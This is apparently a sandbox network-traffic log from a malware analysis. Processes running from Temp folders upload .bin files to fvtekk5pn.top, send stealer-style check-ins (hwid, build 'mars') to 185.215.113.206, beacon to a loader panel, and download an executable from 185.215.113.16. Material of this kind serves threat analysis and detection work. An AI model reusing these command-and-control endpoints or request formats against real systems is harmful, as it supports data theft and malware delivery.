Nov 22, 2024 20:36:48.799192905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799228907 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799350977 CET	372	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799385071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799417973 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799463987 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799499035 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:48.799534082 CET	1236	IN	Data Raw: a9 b4 9e 50 d8 91 1d f1 7f b2 f9 5d c2 1e 16 b2 7f 71 e4 2b 11 84 96 d4 87 6a 45 22 67 86 97 6c 02 fd 6e a7 17 a5 d0 f6 eb 04 b4 94 74 b4 c2 06 13 bc af 7c ec 30 10 76 72 a4 92 31 67 b5 e3 01 68 d4 4f f0 e8 e0 94 d4 69 00 9a cb 2f ed 7c a3 ee 7f Data Ascii: P]q+jE"glnt\|0vr1ghOi/\|jgv4('`m7-CQwyuf4*;ibTEwLy7dR&W4z]&Ba7N_x!Td<lt~e@_z
Nov 22, 2024 20:36:48.799571991 CET	1236	IN	Data Raw: 8e ef e4 51 ce 91 c9 3b 50 d4 02 5b 98 d5 cb 0b af e0 dc 5c b3 76 ff 64 a0 6b ee ee b3 6c d9 fc a4 be ec 40 fe 16 0b 0e b3 af 87 dc 43 4f 2a 0b a9 ae d4 36 de 14 a3 63 ae 64 d0 ed 1d 9f fc 2f c7 c2 e3 a5 a3 c7 ec cc 1e 2f 2d 31 ac d9 be 5e b1 c5 Data Ascii: Q;P[\vdkl@CO*6cd//-1^q6>Tt!Nk6L>O2-@#f),8=3&/n>&U.yr'tu{@(M}57%hD$V&4^
Nov 22, 2024 20:36:48.920290947 CET	1236	IN	Data Raw: ae 00 cb a2 6f 5e 53 56 d3 23 c6 85 aa c1 ce a9 79 dc 67 58 2a 57 43 22 ab c6 62 13 1f 83 c9 3d 9b d9 cc aa 74 b1 f0 3c c8 91 96 56 bf db a9 17 fb 30 c2 10 ee e4 df c0 a2 9e b3 40 5e be 7f 89 76 c8 52 50 80 bf ef 58 04 3f e5 47 a5 91 e3 7a 7a c7 Data Ascii: o^SV#ygX*WC"b=t<V0@^vRPX?Gzze7rS?}m-2k)6l?e_42CA$f\|!PSP^\|U;yosTic\|knQGRA]]]c}a#[2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49896	34.116.198.130	80	4296	C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:47.963548899 CET	642	OUT	POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: / Content-Length: 463 Content-Type: multipart/form-data; boundary=------------------------jbau9hxrAKydOQrcdExHrE Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 62 61 75 39 68 78 72 41 4b 79 64 4f 51 72 63 64 45 78 48 72 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 75 67 6f 76 6f 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5e 60 88 fe 4e 09 17 a5 a7 dc 44 26 fb ed cb 02 93 cf 0e dc c4 da d5 7f c3 74 1a 04 39 a6 e6 1d 3f 20 7c 95 b4 6d 19 f3 6b 2f e8 83 d5 a0 f8 bc 02 96 ea 4e d9 4f 37 73 bd 18 3a 3a 16 47 dd c7 ad 68 89 d1 f9 4d 0c ab a7 84 87 8e 03 df c3 b1 7a bd 43 a5 99 d2 a3 48 ed e8 7d de 7a 1e 11 17 bf a0 fe 09 fb 2f 4d 16 02 95 41 76 88 a7 b0 2d d3 71 db ed db 75 6b c5 76 78 59 dc 6e 4e bd 3c 25 e9 40 f6 4d 1f 27 6d d9 20 81 fb 84 71 0e 9b d9 e1 d4 d5 59 79 1a 7f 7b 1b 28 d1 6a 68 bb c1 af 28 c4 8c ed bf d3 b8 c0 99 b6 1b 5a f1 d3 15 7b [TRUNCATED] Data Ascii: --------------------------jbau9hxrAKydOQrcdExHrEContent-Disposition: form-data; name="file"; filename="Wugovos.bin"Content-Type: application/octet-stream^`ND&t9? \|mk/NO7s::GhMzCH}z/MAv-qukvxYnN<%@M'm qYy{(jh(Z{Exn*j/'!p!Uh9PhS%iU!2cU@7rQp[--------------------------jbau9hxrAKydOQrcdExHrE--
Nov 22, 2024 20:36:49.309447050 CET	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Fri, 22 Nov 2024 19:36:49 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49906	34.116.198.130	80	4296	C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:50.933783054 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: / Content-Length: 71671 Content-Type: multipart/form-data; boundary=------------------------m2QorkCQ39oPmNi0A2wAwL Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6d 32 51 6f 72 6b 43 51 33 39 6f 50 6d 4e 69 30 41 32 77 41 77 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 6b 65 63 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a cd 8c 43 f6 16 cd 5c 70 18 01 b0 02 12 ca 82 82 08 07 03 8e f5 12 42 0e 66 82 40 2a 2c dd c9 1d 43 8a 9c 74 71 a3 cd c6 4d b1 8d 23 fc a5 8a ef 80 3a 10 68 cf 5f 29 0d 83 d0 a2 93 86 2b 69 df 25 d5 8e 67 53 d0 3f d3 87 a9 e0 a8 2c 71 c6 f8 5a 51 3b e7 c4 ee 7c 5a e1 6b 7b b7 05 8a 28 74 70 17 06 74 73 a9 ae 01 60 27 cc 36 21 9a 41 41 c1 e3 b1 88 f6 97 25 b3 ef f8 4c f6 ca a6 8f 34 1b 27 99 46 5c c4 00 bf 1d 36 d6 b7 57 e2 05 10 dc 18 35 df 9e 26 ae 37 25 db eb 26 5b 75 87 74 22 c9 33 cc 57 92 a7 a8 71 03 93 37 2e bf 30 73 a7 [TRUNCATED] Data Ascii: --------------------------m2QorkCQ39oPmNi0A2wAwLContent-Disposition: form-data; name="file"; filename="Lekecib.bin"Content-Type: application/octet-streamC\pBf@,CtqM#:h_)+i%gS?,qZQ;\|Zk{(tpts`'6!AA%L4'F\6W5&7%&[ut"3Wq7.0s3G7twSshKORfeg/N{M]S,H)JQW.2iPZ4yE(JclAA}pV_7plnDpf6,nDI8?%zbPT'X?f!:i./w9VyB8#F@&qyCe`C !{bY(qb)Q/`B<wd`BKLrRJ@Zei2FWAw?Kw=xrm:G$SvM]Lb92.B;\|0B9]N1@XYk,-Jr)ujqri9{7+I_]j;H/_N)zZ-B25F]6/?bn8Qov2-7[.f%$Y;>/y.6A&mB\|DZy.wS?MB=n2n0s?G{mP=M!!R}NWN .l~wnb3\dF=Ly34 [TRUNCATED]
Nov 22, 2024 20:36:51.053687096 CET	12360	OUT	Data Raw: 52 db 3b 30 39 a6 8d 22 fe 71 b1 3d 1d 67 25 b1 02 99 11 1d 74 11 93 a1 72 12 20 44 dd ac 87 37 a9 1d bb 45 17 60 72 95 d6 12 64 7f 2b d1 68 89 21 0f 99 6a 9c 97 c3 0e 72 21 80 a1 5c 0f b1 c1 3b cb 0b 55 e7 9c 91 e9 20 58 3a e5 58 d1 98 65 f2 93 Data Ascii: R;09"q=g%tr D7E`rd+h!jr!\;U X:XeloDt,cckN^\|1dhVSMRxj>lGD3mQitF$4&, \|Ng>e1}gK![=!*{
Nov 22, 2024 20:36:51.053832054 CET	12360	OUT	Data Raw: ca d0 0e b5 db 76 92 07 12 a8 91 cd f7 47 e7 bc be 1c 34 b2 b4 b8 d7 55 8c f7 42 df 6e 3a f9 52 2e 70 b0 fa bd fe 9a ec da 37 fc 68 30 01 c0 f8 e2 b6 9c 92 c6 95 39 15 e3 ae 5e 28 89 1f 68 f2 ff fd e2 df ef cf 12 da cd 9e b9 e7 74 4c 55 d3 f4 8e Data Ascii: vG4UBn:R.p7h09^(htLU?<'u!(,(*Mg^Jtn/]#B,>?QaG"&!O/E?%[x/2,ZP'UN3~VNNOP3r/V
Nov 22, 2024 20:36:51.175653934 CET	14832	OUT	Data Raw: b0 93 44 44 f9 cb 30 93 d6 70 38 9f 4f d5 cf 64 ca 83 aa 2b 83 d8 fb 7c f5 c4 46 a9 7f b2 50 d3 54 05 ab ce a1 19 d6 d4 6c d1 74 a7 be cf f6 c8 a3 6c d2 fb fe e5 2f c7 ad 2b 75 9c 51 90 5f a7 26 f6 1c c1 96 c0 e0 05 32 51 6e c2 8c 4f 65 21 9f 23 Data Ascii: DD0p8Od+\|FPTltl/+uQ_&2QnOe!#bW+GLkYD-w2iUl^=Yl_*DMgUSnjWu&I#R8Bt=gYt7:z"zTcLNfs(-(K>nX
Nov 22, 2024 20:36:51.216120005 CET	19940	OUT	Data Raw: a2 5b ec cd 56 6e 9a de 26 49 4c 15 22 45 2c 2c cd 8f 55 8d 10 94 d8 c9 a4 90 36 07 6b b2 49 c5 51 61 63 93 68 94 96 e9 68 9e 67 9e f4 6f 4e 8d 48 b3 53 28 c3 cf c0 f5 b0 4e b1 da 75 a0 0b 57 35 38 b4 68 e0 7a 0b 60 2b af e2 08 25 d1 3e fd 0d 65 Data Ascii: [Vn&IL"E,,U6kIQachhgoNHS(NuW58hz`+%>e5Ov>aY7rKtwl\|B7%>yqQ5Wq]t`y}TO&{hFLOo%91(/3,,rU!l-0rJRzn,tPa1`\
Nov 22, 2024 20:36:52.863845110 CET	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Fri, 22 Nov 2024 19:36:52 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49924	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:56.087348938 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008254001&unit=246122658369
Nov 22, 2024 20:36:57.566363096 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49926	185.215.113.206	80	6520	C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:56.335376978 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:36:57.732863903 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:36:57.748318911 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 2d 2d 0d 0a Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build"mars------IIJDBGDGCGDAKFIDGIDB--
Nov 22, 2024 20:36:58.191654921 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49939	185.215.113.16	80	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:58.723670959 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 22, 2024 20:37:00.115272045 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:59 GMT Content-Type: application/octet-stream Content-Length: 2819584 Last-Modified: Fri, 22 Nov 2024 19:31:44 GMT Connection: keep-alive ETag: "6740dc20-2b0600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ +W+`Ui` @ @.rsrc`2@.idata 8@jajeyrhy*:@xqskffqo `+@.taggant@+"*@
Nov 22, 2024 20:37:00.115283012 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.115832090 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.115916967 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.115926027 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.116247892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.116357088 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.116365910 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.116906881 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.116980076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:37:00.234905958 CET	1236	IN	Data Raw: 82 54 d6 20 8e 96 98 cf a9 b6 02 27 c9 a5 ca 0b 60 06 a5 f7 6c 71 de 24 e0 ab 7d fc d9 bb 11 32 cf 80 ab f2 ec a0 be 4e a6 9a 55 08 b6 ad be 01 6d 86 8f f6 7a 19 9a ed b3 76 79 73 71 94 0f eb 63 87 b2 c2 a8 76 76 53 11 a3 e8 72 71 94 0f 5d 62 8b Data Ascii: T '`lq$}2NUmzvysqcvvSrq]brvG3RDcsv,NeCI@l13ws6Obo~6}1\|lNlp:vGzR 4v0\d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49940	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:59.491375923 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 22, 2024 20:37:00.703011990 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49947	34.116.198.130	80	4296	C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:00.985786915 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: / Content-Length: 27816 Content-Type: multipart/form-data; boundary=------------------------5l7G3aZgFTH0NKkrout6lX Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 6c 37 47 33 61 5a 67 46 54 48 30 4e 4b 6b 72 6f 75 74 36 6c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 69 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 47 84 7a 93 ce 42 d1 33 23 61 8f f7 6b b5 9d 25 00 59 ef 2d ee 8c a7 2e c4 ce a3 67 fa 59 6a 64 aa 8b 04 11 77 48 a8 06 44 ba 2c 7d 63 0c 3b e3 fc 02 ab 3c af 0f 87 b1 cc b6 00 b6 d2 48 8b 28 77 9b 49 78 b7 11 4c ab ab 7f c9 fa ba e6 9d 1c c2 1f cd 29 af 1f f9 7d 2e 30 89 8f e4 af e7 fa 86 46 14 39 a7 30 8b 24 c6 fe 01 a0 b8 68 51 12 89 d9 b6 e5 9f 27 c0 78 1f a7 f0 c3 93 d7 63 35 4a 87 1f ea 47 49 84 0a cd 07 32 41 6f 7d a7 8c ea f1 df b7 d2 77 7e fb fc e2 8b 5a c9 0b f0 5b 3b d7 d0 7f 6f b3 a0 a9 0d cc 42 99 01 07 40 31 [TRUNCATED] Data Ascii: --------------------------5l7G3aZgFTH0NKkrout6lXContent-Disposition: form-data; name="file"; filename="Hiwoziha.bin"Content-Type: application/octet-streamGzB3#ak%Y-.gYjdwHD,}c;<H(wIxL)}.0F90$hQ'xc5JGI2Ao}w~Z[;oB@1G]G.ofgCC9 XE\[IBmknVZj<%{caGd_mCZxVHsEUrN1ii&Ku&?=NwjM`>l]%Y38qP}oBG)&#_T=Ix"NfTc}S:&nc\hb>AJ+WhE8EHIB9}Ci[XK:lqW^}7+e`y},j/`fvj9(j5w'E<x~R!C#y@L(+r R< [MGUq$4=JTa=4fw8Jgz(@G[NwG/'@!dyvaJ3bb,;Cfy)9S~SN,"kX"*)r&VCak3Zhm%E6:u.hQp( [TRUNCATED]
Nov 22, 2024 20:37:01.105361938 CET	2472	OUT	Data Raw: f2 b8 57 e9 c6 68 b8 4e 1a 2d c4 2b 88 31 93 41 8c 8a 60 d6 c4 f2 03 71 e0 0f 24 4d 2b 09 8d 4d 65 84 e4 d6 3c 3a b3 43 d6 4c 67 f9 a9 67 6c 78 e0 c7 15 5f 4f 4d a0 26 11 9f 59 32 da 28 3a 9e c6 a6 c9 47 c2 47 58 6b 66 80 80 95 e1 6b 2a 00 df 54 Data Ascii: WhN-+1A`q$M+Me<:CLgglx_OM&Y2(:GGXkfk*TG_xlb9hpVZaPv"DDi"DfNa^IUEudtNUk{[TZ3=Uk,F}^N+z
Nov 22, 2024 20:37:01.105436087 CET	2472	OUT	Data Raw: d1 a2 0d e8 e4 72 0c db ba 00 55 a3 ce fa 39 7e fe 9f 4b 9c ce 51 cd 1a d3 f5 f3 c7 0b a0 46 ec 71 e0 3c a2 7e 4a 91 96 3f 64 4d 50 fb f7 1c 25 c8 ee b6 24 14 49 c3 18 be a2 66 12 b1 19 09 4d 0e cf d5 ed c2 ff a4 e4 cb 0c 73 49 f6 5a 87 0a d6 15 Data Ascii: rU9~KQFq<~J?dMP%$IfMsIZ15B53!h(5UrEBfl8Rr,?--%qd4J*"(5:01;CRY_6QX{y@;vrgzkIz"\|?z
Nov 22, 2024 20:37:01.105453968 CET	2472	OUT	Data Raw: c9 8c 41 ad 3c bb 96 12 8a f7 10 75 ac 17 84 33 98 43 19 df a8 ee df 20 fd 96 19 c9 ef 9e d9 a2 4a 31 2f 25 75 85 7c af a0 45 41 78 2e 67 90 e7 bf a4 d0 7e c1 5e 57 57 73 01 7c 59 80 2a ce ec 88 15 f8 1d 8b 37 cd 80 57 53 1c f4 75 07 00 1a 54 d9 Data Ascii: A<u3C J1/%u\|EAx.g~^WWs\|Y7WSuT8.2;Mg;4x1>,>\grJ3!/ojEls(3Seaj9 <]7Qdi{AQ=xiN3<rB8ymO(wzH#A3
